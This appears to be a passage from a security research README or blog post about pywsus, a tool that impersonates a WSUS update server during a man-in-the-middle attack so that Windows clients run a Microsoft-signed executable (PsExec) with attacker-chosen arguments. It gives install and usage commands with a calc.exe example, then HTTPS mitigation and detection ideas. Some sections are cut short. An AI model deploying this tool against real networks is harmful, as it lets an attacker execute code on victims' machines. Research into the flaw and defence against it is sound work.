The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools, such as Bettercap.
virtualenv -p /usr/bin/python3 ./venv source ./venv/bin/activate pip install -r ./requirements.txt
Usage: pywsus.py [-h] -H HOST [-p PORT] -c COMMAND -e EXECUTABLE [-v] OPTIONS: -h, --help show this help message and exit -H HOST, --host HOST The listening adress. -p PORT, --port PORT The listening port. -c COMMAND, --command COMMAND The parameters for the current payload -e EXECUTABLE, --executable EXECUTABLE The executable to returned to the victim. It has to be signed by Microsoft--e.g., psexec -v, --verbose increase output verbosity. Example: python pywsus.py -c '/accepteula /s calc.exe' -e PsExec64.exe
From our perspective, the best way to avoid exploitability of this issue is to force WSUS deployments to use a secured HTTPS channel.
The certificate presented by the WSUS server must be validated by the client. Error in validating the certificate will result in the wupdate client closing the connection.
The three major ways of generating a certificate for a WSUS server are:
On the detection side, a client enrolled with WSUS will report their installed updates inventory periodically. Looking for installed updates that stand-out from the ones approved and deployed could be a way to detect such attack. This is a preliminary idea that we have not explored yet. Let us know on Twitter or LinkedIn if you have any experience doing this kind of installed patches differential analysis at the scale of an organization.
For their contributions to this research and blogpost.
For writing and researching the original proxy PoC